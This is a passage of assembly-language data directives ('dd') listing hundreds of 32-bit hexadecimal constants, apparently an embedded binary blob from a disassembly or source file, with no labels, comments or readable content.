dd 5D877DC6h, 1A16A345h, 99E8AA45h, 0E9EED927h, 410112F4h
dd 268521ABh, 5358956h, 3C80E81Ch, 6A3D0819h, 0C81F951Ah
dd 8C24AACh, 5017E4E0h, 50891A15h, 0B0C0A404h, 3DDAC9A1h
dd 7C80E654h, 0B9D233EAh, 0C21DA1F0h, 7336F2C9h, 9213994Bh
dd 44F5F00Eh, 3BB4F7Bh, 6238092Fh, 0FF904220h, 67DF5030h
dd 9DC35ED4h, 80052571h, 0F7BD383Dh, 0E9057406h, 129FF1B9h
dd 5F7B8C44h, 0BD5D7C02h, 0E2551232h, 3A45D601h, 0FF7067h
dd 16A3977h, 586A4C98h, 0F025C736h, 7C09B5BEh, 0FF7151ABh
dd 0CA5C127h, 682736BBh, 0F6593D9Ah, 31B41509h, 223E06DCh
dd 8E4C0D3Dh, 5D2F2A46h, 5324709Ch, 188D5356h, 933BE40Bh
dd 19251482h, 0F1484110h, 0CAA237Ah, 0EBD3110Bh, 5CEF2641h
dd 1544135h, 0C9E9D114h, 0D8EAD1DBh, 0C9050BD8h, 0F3F7F475h
dd 0CEBC09C5h, 35C87466h, 60B0147Eh, 0E72D10Ch, 7877513Bh
dd 0C3077808h, 4E017659h, 6D859A5Ah, 7047E4BDh, 6F0D2B41h
dd 6F575114h, 0C980DA5h, 50EB18C2h, 12106FA9h, 7C08240Ch
dd 911488C8h, 6C100BCAh, 225E0C64h, 2BF076ECh, 9B1BBCA9h
dd 0F4111424h, 0DA25BE50h, 0C2E9F250h, 5DCB61F6h, 3BA598A4h
dd 18EC830Bh, 0A16295F6h, 339F6868h, 0FD049FDBh, 0E450823Eh
dd 5E03F0F6h, 4EB06856h, 8C58C269h, 44F4D4Ch, 8C1D0B82h
dd 84AC321Ch, 906A05B5h, 110D1A53h, 396095CEh, 44A35158h
dd 0B8AD522Fh, 951C314Ah, 0C522A105h, 142C4A4Ch, 0FBF0EB75h
dd 0E9273484h, 4431EE9Fh, 5D323994h, 44A13418h, 837A98B9h
dd 2D268D8Eh, 0C8204E84h, 3FB8E01Eh, 65316AD4h, 9A8D9470h
dd 74AE16FFh, 394BBF63h, 0F761E23Ch, 0A024A607h, 0FFC117E8h
dd 0FBC157E3h, 0DC75C602h, 25FD0FFFh, 0BDCCBD37h, 0F40B5EEBh
dd 32D38B66h, 0B53ED6E5h, 0D00C3EFFh, 52E09429h, 3A686056h
dd 89A7ED56h, 0D7501425h, 298C3D19h, 658D8292h, 31E57DCCh
dd 90DEF66Bh, 8C1CFCA5h, 6C88199Eh, 0C04693E6h, 535B0105h
dd 0BE934691h, 3EB26FE5h, 4C4C84BCh, 1D506FB0h, 2240EB24h
dd 324E9353h, 4E4E8839h, 8592269h, 21720B3h, 7E14E230h
dd 0D449310h, 3F359EE8h, 0FA45A5A0h, 6A6C49A1h, 1C2E1DCCh
dd 64B4C9AAh, 0E9244984h, 0D35163DEh, 20427D08h, 24E8B4DEh
dd 4F33B12Fh, 24202363h, 145E28FDh, 86DF3BE4h, 0BF6F9C35h
dd 1B04EB44h, 46B06798h, 84C432BFh, 244F44DCh, 536013EBh
dd 127D2E2Ah, 0D072B7F9h, 4B6674A2h, 6226B5C2h, 89588E44h
dd 0F2A14DF5h, 11A6231Bh, 5E8B2784h, 0AE74A7EBh, 45F63201h
dd 40D9040Dh, 0F21C7E99h, 823B12B2h, 0B21E7FD6h, 0AB333CDBh
dd 70AD9D22h, 0C823A252h, 0C84FDCE9h, 9F3611B4h, 0DC8ABE91h
dd 0B4E014D4h, 425A12C8h, 6B31B16h, 0B474DFFDh, 0E457CB56h
dd 9C74C568h, 18B49050h, 0EB080475h, 0D68DAC06h, 0DE676752h
dd 0EE6464D7h, 0B2096BD4h, 145CD271h, 76CE9C6h, 0D0E6855Fh
dd 56D285A7h, 924A8D3Fh, 61ED0D74h, 0F101054Bh, 3227AC49h
dd 0C15E1BF3h, 3FA02B15h, 9FC27384h, 5B974F7Ah, 0B60F431Bh
dd 4C8A3518h, 0B7888424h, 6AE2CD2Dh, 0BF490F16h, 9C0560Eh
dd 13D88A45h, 4EDC2359h, 11FB2C35h, 0CD4EC922h, 4AC03241h
dd 188AD44h, 35C5CEA8h, 0BDD6BABCh, 6A978122h, 0ADD225A6h
dd 41568761h, 0B0B8D20Ah, 303934AEh, 1D724874h, 3D420975h
dd 0CCFAE278h, 0E841D098h, 2980CC02h, 9F242D19h, 0C8306A55h
dd 0A8E0BF59h, 157D8383h, 518901E8h, 0AAAB267Dh, 0F4E408B3h
dd 0EF860F04h, 7D1812EDh, 0BB8414EEh, 1E4D8D88h, 99118AEFh
dd 14AE1AD2h, 0FF41C206h, 7F3BFA08h, 938728C2h, 9FC88626h
dd 29EEB785h, 8D928553h, 0C1905234h, 7A04E6C1h, 989E2AAAh
dd 3B802892h, 74CB02B8h, 1518A2Ch, 0F86E0DF6h, 133BFA06h
dd 0FC1477C7h, 928A0C8Eh, 51084380h, 0EE34790h, 41F57628h
dd 82398024h, 0A57FD419h, 1DFBC3DCh, 72048445h, 3033B1C1h
dd 0F25BCC2Dh, 5250A6CCh, 0E814ADA3h, 0B68699C6h, 0BF33798Ch
dd 89A521C0h, 0BC49A359h, 0C555EBE0h, 0A8FF7983h, 0AC4824B6h
dd 0A28C43AAh, 0FF3DA1A1h, 0DAC1654Fh, 11A18CE8h, 4A55212Dh
dd 82FB20FDh, 4EC3080Ch, 0EB02AB98h, 1D39120Dh, 0EE8B470h
dd 438EE837h, 90CDB254h, 0AB04953Eh, 25F1392Dh, 564B2245h
dd 98080DFEh, 0BF64E4F3h, 6B32E2C5h, 4315B4FDh, 75FC0B7Ch
dd 14A41A0Fh, 2D4A881Ah, 9BFB6A4h, 0EDF2274h, 0A17AC69h
dd 7D0CF40Dh, 9FFF9C48h, 43EEF8B8h, 0BE0612CAh, 111F0821h
dd 5E76B022h, 5778B840h, 0B5AA2B6Dh, 0D2BA18A9h, 44DD43C6h
dd 40B65FC4h, 0E81205C4h, 86A84F60h, 0B48E853h, 7C2D16F2h
dd 8809BA63h, 2AD70584h, 0C6008377h, 458AF472h, 0A185ECF2h
dd 802A200Eh, 57533752h, 61558D26h, 60AB60Dh, 2FC13BF4h
dd 7FD81D77h, 412BBC54h, 320B831h, 103AD98Bh, 0DF518581h
dd 0DC3DE12Eh, 8AE242AAh, 6AC0FFE6h, 5B5FD075h, 903CB66Ah
dd 8EEA68FAh, 50427B48h, 5657A48Dh, 486C47BAh, 24559FF9h
dd 1E20FD21h, 7A1F5657h, 0E81435A4h, 0C824FA6Dh, 684A5CFCh
dd 0C8283B50h, 175FA645h, 68305C5Ch, 8B661273h, 0B804AA11h
dd 0FB981674h, 948A1410h, 227D6505h, 0EB30E090h, 7402361Ch
dd 20428C10h, 0E3EBB962h, 1D0E1342h, 2A3DE61Ch, 0EBBF1201h
dd 0AF167449h, 1999A71Fh, 0AB315A0Ah, 0F2C84C18h, 0F9207BC1h
dd 0C1F4A53h, 13726132h, 772B7A0Ah, 3C334F0Eh, 0E0EBA9E9h
dd 97844D59h, 0ABC95EBEh, 9A60E329h, 13F99DFDh, 0FD1A5912h
dd 0FEFDB223h, 0E67441E9h
dd 12420840h, 22A61068h, 0D2F6709Fh, 356767E7h, 2D68194Ch
dd 0C54A604h, 2A1DA3C5h, 0F42AFB28h, 0E0F011A5h, 78A308A0h
dd 0BB1A2BDBh, 0A10F287Ch, 17D7B20Ch, 0F9D0FF16h, 14BD4810h
dd 85117CA1h, 12125305h, 491C1EDh, 12152265h, 6A31BF4Eh
dd 0A32FF8EBh, 570C8450h, 7A8402EFh, 0DB435356h, 140B50EEh
dd 0FC03C6F7h, 9A784920h, 75EB0749h, 21EB6F12h, 0FA4A12BEh
dd 0CA122453h, 20291F4Ah, 66EB7542h, 3F51EE09h, 7494E383h
dd 3D99210Dh, 0F4137F2Fh, 5E5B74D1h, 313E8C31h, 4512745Ah
dd 8A4C823Bh, 146CF329h, 6C8D3BEEh, 0FA5E9A33h, 0C9665D56h
dd 32287197h, 0E65DAFC8h, 8E06422Bh, 0E4C6E816h, 912C48DEh
dd 0C30CC81Eh, 7407C675h, 0E28118EBh, 15F02C9Bh, 30848B0Eh
dd 0AAD23304h, 0ACEE0C54h, 140ADF0Ah, 75156007h, 5275B1F8h
dd 0EC92A485h, 62BBF4AAh, 0AF0461A8h, 0A6047A32h, 9E04E822h
dd 22FB8161h, 287D12C5h, 2282CEFh, 59E85307h, 7918FFDBh
dd 5F020258h, 0E6BA731h, 76490E88h, 2E7C6DA5h, 0E24BA6CAh
dd 0A5FC219Eh, 0EF24A8DBh, 22E480E2h, 5D12F756h, 94A9ACA5h
dd 0AD3ABBC7h, 2637A25Eh, 624B774Ch, 0C7105701h, 654B7457h
dd 391BA107h, 0F81B28D6h, 0D6E81759h, 29C7B203h, 36311E50h
dd 986D4674h, 3E283449h, 0B4A722C4h, 0F9978390h, 0BB2F1225h
dd 3B1F3618h, 765918C7h, 3C802217h, 0C33D382Eh, 2A53570Dh
dd 0E72F03D1h, 930524B6h, 38D3EB8Ch, 3844168Dh, 9291BD01h
dd 49DE25AFh, 2B520D70h, 8580B825h, 4EAE3B88h, 42A3C06Ah
dd 251EE83Dh, 0F9CEF172h, 0A1DAC13h, 18772F24h, 160DBA19h
dd 0D504196Ah, 47A35784h, 0F981D111h, 72298CBCh, 8ACA1012h
dd 11082611h, 0C480A76h, 2532AB16h, 18C656CFh, 55735712h
dd 3C8813E3h, 252B0759h, 370E82E1h, 322B25DFh, 1FCA26FDh
dd 2CC92CA7h, 1C0A2407h, 132EFE08h, 0EBF40F8Fh, 0D5F50A19h
dd 7DF60203h, 8092BF89h, 300C1E40h, 0C04A33F6h, 0CED7EF8Fh
dd 1C7312A9h, 0F688A6A7h, 0F5B9019Eh, 0A2FA7468h, 0FD723F21h
dd 89B7A04Eh, 278277C3h, 0CB7057E0h, 67F9774Eh, 89FF33B1h
dd 0D5587731h, 1A4D4914h, 3CDC648Bh, 812E7744h, 7FC0407Bh
dd 85591444h, 0E44CECC2h, 3E026985h, 12BEB1DDh, 0CA56C21Ch
dd 563F0521h, 68EF086Ah, 2BC9F825h, 6C060224h, 0C4F809E4h
dd 6BE85609h, 655356BAh, 32C18619h, 86E4085Eh, 2FB146DAh
dd 84DFD6C7h, 92ECEB56h, 9EE2F505h, 94028842h, 4356395Eh
dd 0A1447E41h, 0AE25542Bh, 4A1FB026h, 98C4205Dh, 0F4E8C4F2h
dd 0D217E801h, 0BC4057ECh, 177C2A14h, 7734FE24h, 0A1E268B0h
dd 8359870Dh, 4605EE24h, 7C44463Bh, 0F1BDC0BCh, 909C552h
dd 97CB9189h, 23702579h, 5AE6C697h, 0C35BF405h, 0D46F60Fh
dd 210F6F40h, 0E9E81076h, 0D8F7C38Ch, 0C05E1B46h, 532863B2h
dd 0E80C5A3Ch, 88F45A86h, 97E96C8h, 900F980h, 8A96637h
dd 315BEB90h, 0EB4028A6h, 5726147Eh, 0B4163C50h, 0CCCA3EEh
dd 5F0E75C7h, 1877B2A8h, 1289FD24h, 0EAB507EBh, 3542D6D4h
dd 9C44AF63h, 0CDFE0689h, 0AA8844F8h, 6FD2A64h, 11C8F634h
dd 4DC8FAFBh, 48DD3879h, 0FC66107Eh, 23D6302Fh, 0F1252A4h
dd 0FF2E0307h, 1DC1501Eh, 451AEB43h, 13DC8316h, 0DA024436h
dd 751CF136h, 22ED0BFCh, 39B38A03h, 14BBE2B4h, 76410CBAh
dd 5E94E8E0h, 4EF9B6B8h, 0AB6455C9h, 0B539FB5Dh, 0ACFBD996h
dd 31A51D0Dh, 77E62EF7h, 7E07AFB9h, 0FD5AD726h, 0DED6FEEDh
dd 8D8B4519h, 0C3133FE7h, 1FF59710h, 1DD64E74h, 8CAACBD5h
dd 0A6EF502Bh, 0E805AF83h, 0EB83EF3Bh, 0A98AB155h, 0F24ADC63h
dd 3E2F3185h, 42B85055h, 892236AAh, 7DE61EE3h, 6543EF11h
dd 14C47BEBh, 57C758BEh, 4C97B875h, 0A8DCD32Dh, 0C3F52410h
dd 0CFB75767h, 405911B9h, 0EB1EB623h, 48797B3Ah, 5927CA34h
dd 720FA929h, 81E2FC09h, 0E2418691h, 7D4133EEh, 12EB608Dh
dd 74BC1164h, 0BF1E200Bh, 0FB66AF44h, 0C7FF0C7Fh, 67E10C0Eh
dd 3F3D885Fh, 90C8D027h, 61B11FE2h, 7406D164h, 774E7025h
dd 71A04E52h, 0E873B568h, 136D6D27h, 4C22B212h, 0E07CAD79h
dd 0FCA62010h, 94968E30h, 6508011h, 2575765Fh, 0DE4AB857h
dd 0AA56358Eh, 53604449h, 803D88DCh, 433A2346h, 626488ACh
dd 0AA52840Fh, 5380EEC9h, 1E826DDh, 7EF33B14h, 94442B10h
dd 25AAC1E8h, 1412F4FFh, 1C5D391Ah, 8A72F12Ah, 8F17AAE8h
dd 0A1A44589h, 88F4A980h, 0A856C41Bh, 1064E2F2h, 768201A7h
dd 229D9E18h, 0F18E5D4Ah, 974C663h, 34A8A75Bh, 907A74DFh
dd 0E9580226h, 7D277850h, 0A5ECD2D3h, 3B6C507Ch, 417F2FF7h
dd 4625A8D6h, 0AF80570Bh, 81195128h, 73302CA2h, 720218C4h
dd 38CA3E22h, 74275D73h, 3BBF501Ah, 13A5D33Ah, 9F4A750h
dd 723E08F2h, 76CA8404h, 4BBE40ADh, 0A82E657h, 0BE91A5EBh
dd 0B8315731h, 96629DE4h, 28371804h, 7D860F09h, 86357B28h
dd 177AE9E2h, 0D11025A2h, 9495096Ah, 0E4B98132h, 0CF88497Bh
dd 0FC5DA1C8h, 46C00325h, 0B12925D3h, 1610876Fh, 4C45DBA3h
dd 50545512h, 0C87D859Ch, 9AAF9378h, 575C06DAh, 0D7FB90B7h
dd 3551A6B6h, 4964E479h, 44D67422h, 2BE0497Ah, 0F6626125h
dd 0BA504254h, 92F58CB0h, 42B6D82Ah, 6EF850D3h, 74FB6898h
dd 431B2D4Ch, 0F29A4A4Ch, 0A92E1634h, 5E60B259h, 0BB4515Dh
dd 0A337518Eh, 0D3874F58h, 93D6AE3h, 5ABE861h, 0F793D451h
dd 0F892001Fh, 26BA1FE1h, 58A14EFCh, 5E38FC92h, 940F010Bh
dd 240606C3h, 9BAD21Dh, 1B7A9BEEh, 641CA351h, 88C354C8h
dd 0AA19740Ch, 16CE713Dh, 4724AB11h, 0EE3E8E4Bh, 0DF8F959Fh
dd 6AD9B4F7h, 0A8E8040Bh, 20E21AA5h, 89DF7439h, 0B034A438h
dd 8D37C89Ah, 0C49945E8h, 0FC8A2B36h, 2A283D8Bh, 9E565220h
dd 1C43D038h, 7CC3F685h, 273F8343h, 20803E48h, 0B734FF32h
dd 963C8D39h, 6AC0AE8h, 5155928h, 4478B0Bh, 124FA246h
dd 81C1F0EBh, 887F02E0h, 3FEF3224h, 3C09DFE6h, 845E35EBh
dd 0CB7048Fh, 60757C32h, 27D987Ah, 7E90DEF7h, 0CD53B54Eh
dd 1A8E3A1Ah, 40CB8428h, 54C026AFh, 83B00C0Eh, 14046E64h
dd 0D8E1D6B1h, 8B46C294h, 40DF138Ch, 0D99702BFh, 943375A4h
dd 312EB435h, 0AD1A6681h, 9BC6239Fh, 3A3C82Bh, 0C1F6F8A2h
dd 0DBF74003h, 0D341971Bh, 6F35D823h, 83A13730h, 0AB5E4810h
dd 0E932055Fh, 0F792D4E0h, 0DE224E10h, 0F6D9DA2Dh, 0BFE7B950h
dd 0A3C0F8CBh, 8A38090Dh, 23F63804h, 0C4C21E16h, 0CCFBEC1Ah
dd 2BCED72Fh, 0C13C0550h, 0E4E8F84Eh, 5A10C38Ah, 9757FB06h
dd 854FC097h, 89B894FFh, 1A24C35Fh, 7418808Dh, 103D8B0Ah
dd 7CC1FF41h, 53F675D2h, 45A867Eh, 134619BFh, 4F75C64Ah
dd 1131B2EEh, 0B07CB29Bh, 94DF54A8h, 83501213h, 59C0CC3h
dd 60D8955h, 0F959038Bh, 263D837Ah, 0A1C5B487h, 0E1A23B75h
dd 0A43D3BC4h, 83340F1Eh, 0BBFA386h, 0C79F7ACh, 110F659h
dd 63906974h, 0B1F75025h, 0CEDB3C98h, 0AE4EDF22h, 0C3161261h
dd 2F48396Dh, 798B3CCDh, 6133069h, 6440C582h, 5724581Ch
dd 0C4D85348h, 924A660Ah, 3CED62D3h, 9308F68Ch, 2EBCCBADh
dd 1473ED3Ch, 2561C955h, 6915EB59h, 0B72AAD2Ah, 1F4F4A7Dh
dd 9E1D0E83h, 0FE192F7Eh, 0C1CC921Fh, 0C8816678h, 0FB69F70Ch
dd 2536F676h, 631275Ch
dd 81785E04h, 0B8967DCFh, 210E8B28h, 0A2EAE853h, 80E9C184h
dd 6F49A502h, 15194F84h, 2A168F7Ah, 223D6945h, 62EE1FD2h
dd 654F379Eh, 14CDD387h, 0B3C44E88h, 59D88B05h, 9BCF4DAAh
dd 10F63F27h, 0C08B4C1Bh, 0E853BC04h, 0EF8ABBAFh, 2DFD363Fh
dd 3232B6EDh, 81D5124Ah, 48FC4325h, 0F8BD172Ah, 0C0502F2Eh
dd 0BAA319DEh, 0DB77ECBBh, 0A064AB9Bh, 74599716h, 43EA2418h
dd 7A1D53B5h, 742F6C7Ah, 57BAFA21h, 51204F41h, 49A2CA2Ah
dd 96618EDFh, 21154A14h, 3D42D347h, 0E254884Ah, 0B6D31D75h
dd 0B5101490h, 30F6D0B0h, 60E9990Ah, 3B039901h, 82115BADh
dd 122A9402h, 40195A09h, 6A21F614h, 0F23F5409h, 221F57E4h
dd 5189B5D5h, 0D74CFAF6h, 0BFF824E8h, 440B4A27h, 0D614FCDBh
dd 2734E8Ch, 0C1FE8B58h, 2A4204EFh, 0D198DAC6h, 0AFC39929h
dd 0F1951017h, 0CD104253h, 0C85B3DCAh, 0B60FB135h, 482E02Ah
dd 0ABD8E5AEh, 82A1E33Ah, 0BFED3B30h, 92A03193h, 4EB15455h
dd 42438A28h, 0C8A14354h, 650AC9ABh, 0B0D67C1Dh, 21DE55FAh
dd 0EF35C5D0h, 9025041Bh, 210472AFh, 0EE333EEBh, 23491444h
dd 0F24FD6Bh, 44699116h, 444C0A0Dh, 55C27542h, 3CB16845h
dd 7511F2CCh, 0C2F2280Fh, 72CEFAE8h, 460ABFBEh, 0B16613E9h
dd 2149D2DBh, 0D010933Ah, 1AC9AFF9h, 5A9FF6D8h, 0EB419506h
dd 4A2EBCC0h, 39C29E91h, 3C747E20h, 24E7EB11h, 1455A6D0h
dd 0C6F641F8h, 0DCA7EAB4h, 290A3678h, 2B8402BDh, 0BAB7D4C2h
dd 0C123177Bh, 61249D5Dh, 0F8E018Ch, 9AC82BA7h, 0F39F4AD6h
dd 0B7417BCh, 0A81B4A45h, 89AB7F12h, 0C01F2BE7h, 0C628254Ah
dd 7DF701A1h, 40A83D41h, 9914BC1h, 446D225Dh, 0A589917Fh
dd 0C524B512h, 0E991D948h, 1520FF22h, 372544A9h, 5F124F89h
dd 81487124h, 0AB229991h, 8ADFBF44h, 838DC47Eh, 99141AEh
dd 444D225Dh, 1F892B3Dh, 9241512h, 0C1ADF946h, 91D709C8h
dd 44AF22C5h, 8389919Dh, 61247312h, 2F914748h, 21201922h
dd 332944AAh, 59124989h, 85486F24h, 0A1229391h, 89C1AF44h
dd 24E312D7h, 0AB0F44F7h, 33912308h, 57444B22h, 12718965h
dd 5F9F2481h, 0D9BF44E2h, 0F912E989h, 4AC0522h, 91254811h
dd 44492237h, 81897157h, 9D248F12h, 0BB91AB48h, 0E544C922h
dd 0AE9588FFh, 0DABD0C91h, 233FBDB1h, 9240F43h, 0CE68012h
dd 0B164409h, 8126E89h, 11480124h, 9229691h, 89723344h
dd 458F1603h, 8D50117Fh, 97B09A25h, 0D7103009h, 9CEB8142h
dd 47475F09h, 41C74F4Ch, 4548074Fh, 53D75057h, 43CFBD5Fh
dd 19444E54h, 56F54D31h, 34F252EDh, 46063C81h, 106DEB03h
dd 2F510C4h, 0C84504DCh, 35430502h, 84508330h, 38282043h
dd 410758C1h, 0C530379Bh, 21C6E757h, 1A749E3h, 0CB6860ACh
dd 70120367h, 0FF037816h, 3C6E45B8h, 0CD0F37FEh, 50F0705h
dd 75D64E28h, 29056C0Ch, 287FA8A6h, 17F6F7FDh, 74F27277h
dd 656D690Eh, 3E7D5E20h, 20C6766Fh, 50080A0Dh, 0E353B654h
dd 0F071249h, 4E49A20Fh, 44E01E47h, 414D4F1Ah, 6121426h
dd 32303652h, 2D301238h, 62619820h, 6F74806Ch, 0CBF569F4h
dd 0DDF9AE7Dh, 681C9C7Ah, 387029FCh, 37422820h, 746F6E0Dh
dd 750A877Ch, 73B06867h, 0CC636170h, 6CF96648h, 695277E8h
dd 0E37DD39h, 0A73894EFh, 74F4D638h, 35F26446h, 63757010h
dd 69765872h, 44C674ABh, 28A668D0h, 0DBF32463h, 52D01A7Eh
dd 6034CA28h, 565F6F7Eh, 2FBA782Ch, 4107B2D0h, 1CE309DDh
dd 39573160h, 709D9CF8h, 7B64B3F6h, 6421CF73h, 2CE5E89Bh
dd 0DA8C382Ch, 820E4A8Eh, 1A1A64C9h, 248158B4h, 6D241F37h
dd 0F2AD20A7h, 61C0A168h, 2B2218A8h, 0CA306B63h, 3586DC18h
dd 6DB847E5h, 0A306A05Fh, 6D7244C4h, 3C700193h, 0F5FE6782h
dd 0F99642B7h, 0F330370Ah, 509F398Ah, 425922B5h, 109A6D56h
dd 2C245E74h, 0E7786B38h, 294275FDh, 28604573h, 662C8161h
dd 28DFC246h, 0F183676Eh, 3BD50CBCh, 0E52725A8h, 904D8058h
dd 3AC2D42Eh, 562C6633h, 0AB1079D7h, 0EDE32B43h, 3AA13752h
dd 0B562A84Ch, 28A179E4h, 175DA30Ah, 0F234512h, 50242B21h
dd 203A0CD5h, 2DC2E41h, 0A4E63C14h, 334DE11Bh, 77DA6B5Ah
dd 0CC6B3EDAh, 0C54D1628h, 65375476h, 6867EC57h, 697246D0h
dd 3B93A353h, 6E3E4A69h, 4D62650Ch, 72D941C4h, 67FF790Ch
dd 0CA6C064Eh, 655302D6h, 89404F70h, 763C6F4Eh, 7CA0F744h
dd 0B8945A54h, 20F064DAh, 92747D8Eh, 0EEC200B9h, 4BF2077Eh
dd 7FA26CB0h, 9A610CCh, 74650947h, 0AB84614Ch, 767BD341h
dd 276150DAh, 0D87CB75h, 57100C28h, 64510E90h, 9700479Fh
dd 67611373h, 78DA42F3h, 0DC55637Fh, 32339E80h, 0A3644C2Eh
dd 75846842h, 94790E8Dh, 11E48C58h, 1009DCE8h, 0A9FC10A0h
dd 10A16C10h, 915BAA14h, 3AAB9027h, 0E813AA2Bh, 0EAF49AA6h
dd 800614CCh, 10090364h, 1911348h, 17440D22h, 126F890Ch
dd 48022409h, 22979112h, 7334440Ah, 20140489h, 6765524Ah
dd 484A4358h, 294B3C33h, 0B7240E79h, 956740Bh, 45E60441h
dd 20324BC4h, 689AEB4Fh, 6B30233Fh, 7A741E27h, 0E2417212h
dd 0D56CBB6Ch, 51120C37h, 721114D3h, 2626B448h, 2C248671h
dd 21EA6E45h, 8B34C846h, 6886E49h, 4824A123h, 68A9E858h
dd 927212A0h, 76C1481Ch, 269EA064h, 1618378Ah, 7EDD6F43h
dd 422C67D4h, 4117436Dh, 0FC34BF3Ch, 11A56CE8h, 3F682433h
dd 39D76786h, 21EF29DCh, 4310A116h, 5A4D4D43h, 12722A61h
dd 0E7FB74FCh, 0A232D9Dh, 1832CA4Ah, 4CA129A9h, 381918CDh
dd 0AAD889BDh, 0B458E647h, 64724E65h, 6CA70A40h, 51F2CFDDh
dd 0CB46E1Ah, 705C441Dh, 681478DFh, 0BABE9C8Dh, 49509656h
dd 53E9EE29h, 449C1BBDh, 573D784Ch, 4B434F0Bh, 0B8FB0596h
dd 1170B598h, 0B1A62D96h, 0AC40AC8Dh, 75640CCCh, 69654630h
dd 0E8D64E08h, 92B08596h, 0C2FE8954h, 75432690h, 3A1CA8FBh
dd 0FAD624B8h, 64496305h, 79531621h, 8D6DB152h, 85603689h
dd 47F6EB6Fh, 5B9F3470h, 65CDCE4Bh, 4BB82934h, 436642B1h
dd 9116521Eh, 0DEA37639h, 0A17562B9h, 49281638h, 5079702Bh
dd 71213421h, 9E0B6CEDh, 54891846h, 4EEF9D6Ch, 0D7445D81h
dd 1035F324h, 0AD733ACCh, 644C1A3Ch, 0B8466D41h, 3F0CD624h
dd 28EF7F41h, 7CB39EBEh, 910ACD72h, 4D718E6Eh, 9478AA52h
dd 0AC5A8A8Ah, 0F84B7353h, 4A4E7F52h, 48822C4Ch, 47705ACAh
dd 845652CAh, 9544B14h, 2DE25A90h, 0BD82FD44h, 49385859h
dd 2011A46Ah, 9095D0C6h, 475AD10Fh, 24648ADh, 6E556C74h
dd 0DED4AA77h, 4174B1D2h, 49224C59h, 65707514h, 0BC8C412Bh
dd 47E66DB8h, 4CF96E4Ch, 3D905612h, 897E7352h, 9BB9C545h
dd 0F1DC7856h, 49281BABh, 488847A2h, 6F215400h, 560E7953h
dd 56464022h, 0A7683CB4h, 566A0EE8h, 522C075Ah, 0C1C80F4Ah
dd 0DCB16814h, 0A9FEAEF7h, 4B061270h, 0B28E5300h, 8F0F4141h
dd 78E6CC41h, 8729900Eh, 0CD57E41Ah, 0D09044F0h, 6F54729Ch
dd 0C464D5Ah, 85987942h, 682F68D8h, 57497C18h, 944AD5E0h
dd 3C144E30h, 0E764B24Eh, 60471384h, 707954C2h, 0A6570FA1h
dd 1CC90B76h, 6F5034DCh, 2DCA749Ch, 2997048Ch, 45219A1h
dd 0D7441073h, 88901247h, 86AF4CCBh, 418A1474h, 6257D910h
dd 125089B0h, 410C11DFh
dd 85161AA1h, 744D454Fh, 4179880Ch, 67ED6471h, 3E4C3F1Ah
dd 2165DA61h, 0DA46A28Bh, 0AF7468Eh, 47C268A6h, 19668742h
dd 9AB0F529h, 60DF706Dh, 12E88A69h, 9134947Ah, 11DFA3Eh
dd 7A8509F7h, 845A1870h, 5A2AC42Ch, 10D02B7Bh, 68166425h
dd 32AE016Fh, 0E02E3833h, 36E2356Ch, 0BE9063ECh, 752C31D3h
dd 25201C3Ah, 34BFEC73h, 0F8269906h, 25737830h, 0F953874h
dd 60565728h, 990AD809h, 43936F16h, 72BE0B55h, 937799C1h
dd 0DD524920h, 44201EC0h, 0D3764D69h, 79623D77h, 6F1C5A32h
dd 4F2B1894h, 2342A76h, 0F94B8186h, 20642F8Dh, 7535643Eh
dd 96F0635Dh, 6B949F5Eh, 0ECA4B42Ah, 9620EA2Bh, 552FB84Bh
dd 65EA861Bh, 8485A494h, 452636A1h, 850C651Bh, 50767009h
dd 0D4B2D2CAh, 6AE31E24h, 7241262Ah, 599020DDh, 641BBB42h
dd 826D9D73h, 401C04F2h, 0DC7DFF44h, 50E7C692h, 0C4853FBAh
dd 0B44D2848h, 10D4F8B6h, 7359AEB0h, 182C68C0h, 28721252h
dd 18A1703Fh, 4EC6C821h, 37D7BE28h, 0A8756436h, 0C3458AEBh
dd 929C0F7Ah, 0B5E105D5h, 3D576CFDh, 6F8A25A4h, 866A3869h
dd 6679F2F2h, 2EB89F91h, 10A05677h, 775823EBh, 8F1F504Fh
dd 7BD1BB25h, 7B4D7EC8h, 42E5BE6Dh, 5D496C49h, 2036D661h
dd 205C6144h, 884E9A48h, 6796B01Ah, 0AA979635h, 4AE234C8h
dd 0B5FB6288h, 12935150h, 7C550299h, 41137F48h, 54894350h
dd 41517228h, 6C6862BFh, 0DEAE4994h, 20364194h, 6672BEF0h
dd 0B22D634Bh, 6472E401h, 0D40B9B59h, 548EE85Ch, 312F5020h
dd 2039302Eh, 3798F632h, 0ABF41495h, 0A2E84018h, 8421950Dh
dd 0B42D7978h, 7E81A86Fh, 2C56534Dh, 3C04D12Ch, 435208B6h
dd 0FDAF6F32h, 91D0DFE8h, 0AB683CCFh, 437A4164h, 364DDF0h
dd 8874F883h, 0E32F3A70h, 716AC046h, 97E4AE6Ch, 3216002Eh
dd 0B0437000h, 2E7320F6h, 884BD6F3h, 5C297073h, 13A01F75h
dd 70802C45h, 5754464Fh, 45255241h, 3D71655Ch, 0F48654Fh
dd 9973540Bh, 901C2DDBh, 67A2661Ah, 0A0349512h, 2952281Dh
dd 0B522332Bh, 48405A2h, 0F785D66Ch, 0D6527948h, 0B7C26899h
dd 0C769236Ch, 3464FA52h, 32B6F384h, 50775553h, 52A4878Dh
dd 70141A0Eh, 928D50E2h, 5F42CA74h, 0B23411Dh, 0C2142825h
dd 0C028D66Eh, 77435946h, 0B455DB52h, 13864E5h, 74245494h
dd 455EB76Ch, 2B1F9675h, 1A522CDAh, 0A1A83707h, 9A9452A5h
dd 645841F2h, 4D4D4C6Dh, 287848BEh, 7EB2A546h, 0CA4A4F58h
dd 0A4D54C73h, 3A738718h, 33F32F2Ah, 0DCD7648Ch, 54E45989h
dd 30AC4DFEh, 5B5330BCh, 967C6694h, 0C72CCA83h, 26CAB464h
dd 38B01835h, 0D6AFDE74h, 0FC44C646h, 39A65190h, 744E7965h
dd 8D54D94h, 28661D49h, 3926B604h, 0D3E6681Bh, 7077347Ah
dd 9E2EDDFAh, 4CBA4C6Ch, 5692DB78h, 89DD803Eh, 0A844706Dh
dd 732746D2h, 0B754209h, 9FDE2DD1h, 7A519962h, 0AC4069D7h
dd 33CC2D12h, 0ACDB90B0h, 0BAE9ECBEh, 8029698Bh, 0C4FD8B63h
dd 1928C5BEh, 0A46B2613h, 73E3661Ch, 2EA1DC2Eh, 455A58F3h
dd 23645999h, 0DB5258ADh, 0ACAC7D6Ch, 83E4B8E6h, 9ABBEFC9h
dd 0C5F3EBE6h, 156981B2h, 36786E93h, 942EB2CAh, 0F5DC2A4h
